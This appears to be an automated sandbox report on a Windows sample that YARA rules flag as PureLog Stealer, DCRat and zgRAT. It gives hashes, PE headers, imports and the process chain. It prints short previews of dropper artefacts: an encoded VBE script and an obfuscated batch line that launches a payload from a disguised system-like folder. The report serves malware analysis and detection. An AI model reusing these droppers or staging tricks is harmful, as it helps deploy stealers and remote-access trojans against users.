                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                Malicious:false
                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                C:\Windows\System32\SecurityHealthSystray.exe

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.9865181398105993
                                                                Encrypted:false
                                                                SSDEEP:48:6iJXPt3uM7Jt8Bs3FJsdcV4MKe27ddZzPvqBHqOulajfqXSfbNtm:JPdPc+Vx9MRvkUcjRzNt
                                                                MD5:ECDC31DA9B91F3CD8967CFA9BCC8E614
                                                                SHA1:F3D0A5633E1A23339353EC3A498F771EE958628F
                                                                SHA-256:D4105FC4701699BF45D9985BEEDE54B0885E7CC6C9154908D897759572269B99
                                                                SHA-512:646A096558EE1F640BFC5C8FB14D8DF0EBCE2CF73229D4C19F634AAA420F27BC6788FC4ECDCADFA4B55AC5B88BDA8C087BC13A7D3D72A7A13DC5910470A5B0BD
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..X.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.(.......#GUID...8... ...#Blob...........WU........%3................................................................

                                                                C:\msproviderBrokerMonitornet\09074a7f9aa6e3

                                                                Download File
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):214
                                                                Entropy (8bit):5.734800503443447
                                                                Encrypted:false
                                                                SSDEEP:6:R79fkA3TL1f6nL+3IWVGrVybXvJbo2ddWG:RhkQTB+i3INruZdWG
                                                                MD5:4E7CB8A078E5B3A01513FB64FB6667DB
                                                                SHA1:C5158EF3401BB6E42AEB802BDF61840AF16BA0F6
                                                                SHA-256:7C5AC3CF1CC30C853FE5A379B560167827EA50925141A9F1B5FEB86F0531E813
                                                                SHA-512:8ECE0C21F5F77176968583E7A85C4E3E49934332E0194416576C7D6D0732040959A92D1F7F5DFC17E5341295A549E34C50071E7DAC1870156AA969112B8CAA24
                                                                Malicious:false
                                                                Preview:L3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmrWoaKD2ur4xek6Eck5ZKCydBi3w4DEJWHihPQBrhJZXPLL9zJFP4Ogk32m2RR8qmvaXCYzMiO2AnaN0W46u8zPHk8oWoJaQLsueuy6aU3rpWf7cowfWUNsxfSwEtdhYymy4ptFi7faEHkvEBMr2oD57A79bC2r1VS0trCx5q6Zzxnp4grDh

                                                                C:\msproviderBrokerMonitornet\WinPerfcommon.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):265
                                                                Entropy (8bit):5.899722432776321
                                                                Encrypted:false
                                                                SSDEEP:6:G5vwqK+NkLzWbHZERUrFnBaORbM5nCQKPgwv7q1YV0NKiY267:GAMCzWL6uhBaORbQCAwTeKiY2m
                                                                MD5:F8B56B683C6FAA5B9EB7F37F01AF8C29
                                                                SHA1:89E4357CCDE76FE35AA3CBAC952BB68D691AE9CD
                                                                SHA-256:BD73B65E256773C9CF879C504B7D426573587B5C7B03BEC2D6FCCFDDACCF1721
                                                                SHA-512:321B6A63D3DCA1E52A65A47AB3D3A83D0D7EE59B28F29274B128D9B7F5C49F2CFAAC4F70D3981EE55821CBBDC3234BF4D721CBE3F64A888250AC4C297EB9F768
                                                                Malicious:false
                                                                Preview:#@~^8AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zhkwMW\bN..AMWV+MHGUbYWMU+DzzMjT("Dd+^wL}G%X:h"WV92OaA%j+VhrA:[!,"W6U?D;(OTh^;A;Sx2"ao5Z(R(lYrS~!BP6ls/nJU8AAA==^#~@.

                                                                C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat

                                                                Download File
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):103
                                                                Entropy (8bit):5.151829411850067
                                                                Encrypted:false
                                                                SSDEEP:3:y/EjCku1UQ9Ank/HaJI7HusoZskTMLMDd1cA6Fn:y/sCkueQBHaJI7ChTKCTxo
                                                                MD5:A1C6E7D957B0B22C92C7B314D10E894D
                                                                SHA1:0F20C6FA17A304E0A20947D6E6F368406A19FC25
                                                                SHA-256:BF06F59116A3066353FE51051B9701FB34DDA96E7B80F24D8E6FC6B18BD01723
                                                                SHA-512:20985DACBB86AC9862DA8483978B579C0CCDB3DFF4F23AEE019B006669FD1230A684B2BD12FB43AB489343AD7AFF1FD0A8228890135E1854F9E2A106B7514E02
                                                                Malicious:false
                                                                Preview:%rGyaZNUmEtX%%CLyLdoAqhPu%..%tueAuObSXED%"C:\msproviderBrokerMonitornet/WinPerfcommon.exe"%ngFteMeRCly%

                                                                \Device\Null

                                                                Download File
                                                                Process:C:\Windows\System32\PING.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):502
                                                                Entropy (8bit):4.618657637432167
                                                                Encrypted:false
                                                                SSDEEP:12:PEUZw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sU8dUOAokItULVDv
                                                                MD5:A8873AD91E10B5BC98B84EBAC26A50A7
                                                                SHA1:91B23220CE75D2B3D119382E8ED49412EAF81884
                                                                SHA-256:603BAF93B0565F3BD7172A3E00C133974742955DCA2649E9466D50D320DA2CFE
                                                                SHA-512:DC1C3E9FB6372E6C5B5D63CA8707C434FD1D4EA4B10EEAE44034E44F71669E06A4A8A3095DA0C80A68D7FEE54179E30AA6D046F36041B36AF42566E71C2D090E
                                                                Malicious:false
                                                                Preview:..Pinging 888683 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.507728200101384
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:top.exe
                                                                File size:2'342'756 bytes
                                                                MD5:92d29106be881759ef6f045a3415137d
                                                                SHA1:9b307b4b98851c4325a1f2746c7827a0d14c7e36
                                                                SHA256:b1996319c3b0fafa04179dd7b7de47c74be2dc3dc0d6aa04030b645970e1a9b0
                                                                SHA512:43b526bd521ac72688dc7670c9c9ce323b39675620a0bf202d783906ac650fdc1bbefeb5876f97c5fcf525e6c5d39cc4b29ffd43acd4560baf0745126c5eec8e
                                                                SSDEEP:49152:IBJ+h0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2L:yQhbcmcfM/N1RSavoujWHk
                                                                TLSH:FBB5CF4675D24F32C3B09B354567423D6290DB213A16EF0B7A5F2996A807BF19B332B3
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                File Icon

                                                                Icon Hash:1515d4d4442f2d2d

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x41f530
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007F75A887D22Bh
                                                                jmp 00007F75A887CB3Dh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                push dword ptr [ebp+08h]
                                                                mov esi, ecx
                                                                call 00007F75A886F987h
                                                                mov dword ptr [esi], 004356D0h
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                and dword ptr [ecx+04h], 00000000h
                                                                mov eax, ecx
                                                                and dword ptr [ecx+08h], 00000000h
                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                mov dword ptr [ecx], 004356D0h
                                                                ret
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                mov esi, ecx
                                                                lea eax, dword ptr [esi+04h]
                                                                mov dword ptr [esi], 004356B8h
                                                                push eax
                                                                call 00007F75A887FFCFh
                                                                test byte ptr [ebp+08h], 00000001h
                                                                pop ecx
                                                                je 00007F75A887CCCCh
                                                                push 0000000Ch
                                                                push esi
                                                                call 00007F75A887C289h
                                                                pop ecx
                                                                pop ecx
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007F75A886F902h
                                                                push 0043BEF0h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007F75A887FA89h
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007F75A887CC48h
                                                                push 0043C0F4h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007F75A887FA6Ch
                                                                int3
                                                                jmp 00007F75A8881507h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push 00422900h
                                                                push dword ptr fs:[00000000h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                No network behavior found

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:10:25:03
                                                                Start date:11/01/2025
                                                                Path:C:\Users\user\Desktop\top.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\top.exe"
                                                                Imagebase:0x450000
                                                                File size:2'342'756 bytes
                                                                MD5 hash:92D29106BE881759EF6F045A3415137D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:10:25:03
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
                                                                Imagebase:0xa70000
                                                                File size:147'456 bytes
                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\msproviderBrokerMonitornet/WinPerfcommon.exe"
                                                                Imagebase:0x6e0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 63%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:10:25:37
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
                                                                Imagebase:0x7ff6556f0000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:10:25:37
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
